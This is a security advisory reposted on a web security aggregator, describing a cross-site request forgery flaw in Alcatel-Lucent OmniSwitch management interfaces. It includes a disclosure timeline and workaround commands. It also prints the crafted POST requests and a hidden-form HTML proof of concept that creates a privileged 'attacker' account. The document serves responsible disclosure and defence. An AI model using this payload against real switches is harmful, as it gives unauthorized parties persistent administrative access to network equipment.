HackDig : Dig high-quality web security articles for hacker

[RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

2015-06-10 07:45
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

During a penetration test, RedTeam Pentesting discovered a vulnerability
in the management web interface of an Alcatel-Lucent OmniSwitch 6450.
The management web interface has no protection against cross-site
request forgery attacks. This allows specially crafted web pages to
change the switch configuration and create users, if an administrator
accesses the website while being authenticated in the management web


Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400,
6855, 6900, 10K, 6860
Affected Versions: All Releases:
AOS 6.4.5.R02
AOS 6.4.6.R01
AOS 6.6.4.R01
AOS 6.6.5.R02
AOS 7.3.2.R01
AOS 7.3.3.R01
AOS 7.3.4.R01
AOS 8.1.1.R01
Fixed Versions: -
Vulnerability Type: Cross-site request forgery
Security Risk: medium
Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
Advisory Status: published
CVE: CVE-2015-2805
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805


"The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable
LAN Switches are the latest value stackable switches in the OmniSwitch
family of products. The OmniSwitch 6450 was specifically built for
versatility offering optional upgrade paths for 10 Gigabit stacking, 10
Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and
Metro Ethernet services."

(from the vendor's homepage)

More Details

The management web interface of the OmniSwitch 6450 can be accessed
using a web browser via HTTP. The web interface allows creating new user
accounts, in this case an HTTP request like the following is sent to the

POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 214


This request creates a user "attacker" with the password "secret". All
other parameters are static. All POST parameters can be predicted by

This means that requests of this form can be prepared by attackers and sent
from any web page the user visits in the same browser. If the user is
authenticated to the switch, a valid session cookie is included in the request
automatically, and the action is performed.

In order to activate the new user for the web interface it is necessary
to enable the respective access privileges in the user's profile. This can also
be done via the web interface. Then the HTTP POST request looks like the

POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 167


This request sets all access privileges for the user "attacker" and
is again completely predictable.

Proof of Concept

Visiting the following HTML page will create a new user via the switch's
management web interface, if the user is authenticated at the switch:

<title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
<form action="";
method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />


Disable the web interface by executing the following commands:


no ip service http
no ip service secure-http

AOS 7/8:

ip service http admin-state disable

If this is not possible, use a dedicated browser or browser profile for
managing the switch via the web interface.


Upgrade the firmware to a fixed version, according to the vendor the
fixed versions will be available at the end of July 2015.

Security Risk

If attackers trick a logged-in administrator to visit an attacker-controlled
web page, the attacker can perform actions and reconfigure the switch. In this
situation an attacker can create an additional user account on the switch for
future access. While a successful attack results in full access to the switch,
the attack is hard to exploit because attackers need to know the IP address of
the switch and get an administrative user to access an attacker-controlled web
page. The vulnerability is therefore rated as a medium risk.


2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at

RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Description: Digital signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

Source: 32/nuJ/5102/erusolcsidlluf/gro.stsilces

Read:2746 | Comments:0 | Tags:No Tag

“[RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery”0 Comments

Submit A Comment



Blog :

Verification Code:


Share high-quality web security related articles with you:)


Tag Cloud